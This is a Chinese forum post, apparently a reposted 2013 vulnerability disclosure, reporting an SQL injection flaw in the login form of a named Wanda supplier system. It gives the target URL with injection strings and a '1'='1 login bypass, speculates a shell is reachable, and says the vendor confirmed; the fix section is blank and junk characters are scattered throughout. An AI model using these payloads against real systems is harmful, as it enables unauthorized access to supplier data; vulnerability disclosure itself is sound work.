找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2592|回复: 0
打印 上一主题 下一主题

万达供应商系统SQL注射漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-24 20:16:41 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:万达某分站sql注入。敏感信息泄露。; Z9 i- |: E' a, a5 H
详细说明:& l7 x% L' c& O: z9 N0 X5 p' q
万达scm系统登陆框sql注入。+ V% v. X+ \2 z: k4 f$ ^

: Y) N" d" F; P. J: \% u5 Z, `2 yhttp://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
0 i4 T3 z1 K! t
- M' k5 o; v+ a* d9 E2 V
& \2 T  r6 R4 U0 l500错误。
0 J/ o! t: ]- C. \! p- W9 H, ]1 ?  B8 o) N7 E' H
用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。+ U- d3 E- ^" a: N" \
http://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png
/ e5 k# ]" E) ^3 Q: C+ F$ G截图有一点问题,用户名,和密码输入' and 1=1 --可以得到相同的提示,可自测。)
4 N# u  [+ e# a" q- R' {经过分析,登陆验证的过程应该是:* j" t5 d0 v- \# l

5 N+ `% J$ \+ A$ i7 @0 C% t/ {取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。, v. s, [: D# u; H8 L
http://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png
. x1 R2 E' n# E
7 N2 B, ?1 a  p, }# f4 P1 B$ Toracle数据库,存在注入点。@大连万达,你怎么看?! B# a2 i2 K6 A) q
http://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png
% R  \  a0 l# V$ N) V: j* h
9 }' `1 J0 R$ f6 Q+ N3 d& K系统里有万达的供应商资料什么的,提交数据的地方随便输入',提交500错误。没深入。目测可shell。
; q' `6 d4 l: A. G漏洞证明:. H6 p) x9 p: G% s. s3 z- @
万达scm系统登陆框sql注入。
2 e% n; y  N; C4 C' u; ^' L2 S* o7 @3 S0 `. [$ R$ H
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
; R" \- d& {9 x% c
# w- v1 _8 Q% O) w* u( x+ i! h7 |9 X3 L: n+ |6 r/ U
500错误。2 C: x) A6 I( [0 [' e0 k) I
9 l; J. w1 {! [+ D& q6 g
用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。, \, G1 m9 x" T0 s. u( @
http://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png
( M  {: W& K8 ~( C$ L
# `8 ~9 y0 k1 a+ V) Z% I* W) x, ]: q) e: r& E
(截图有一点问题)
! U3 y2 V6 }' h# d; b4 u. Z5 M) O% Z
怎么饶都饶不过去;经过分析,登陆验证的过程应该是:! S& p6 W/ a' ]; |: n6 a

6 M% p$ n! f; f5 ~" `取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。- ^8 W# x* j/ M- ~5 [- K

  J; q# c0 G: r" X: ~$ `" R绕过:2 w4 d" o( J5 ^
http://www.vans-china.cn/LoginUs ... 1%27=%271&PWD=14 o3 |9 \2 z: d/ k0 e
& q5 Y+ `) P; d

& J3 P4 C/ z2 l8 C! ^) Aoracle数据库,存在注入点。@大连万达,你怎么看?
( Q" K$ z" k2 s* x. J3 f* T! P​系统里有万达的供应商资料什么的,有发布公告,没深入。目测可shell。
- j) u& X9 J% G! @% J8 A! k
3 a+ W. \8 i: l修复方案:; z. t" F! j) g4 j8 c8 N4 n
。。。
  h/ w* u8 u& e8 q/ {0 \8 r) O; A4 s( R5 [4 t. e/ \, H% r
. I0 W+ d6 f6 A* Q
厂商已经确认9 U% }' ]: M3 Q  n; V* D% S, B
1 w+ R4 H' B6 Q& r1 O5 P) z4 F
[/td][/tr]
4 e( P% s2 c% L( _( W% Q- o[/table]
/ ?5 A! q3 U: Y& ~) v8 f$ O3 y' P% y& A" J% W% t6 K

7 w/ ^$ @' Q1 \7 C  |9 X5 K1 Z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表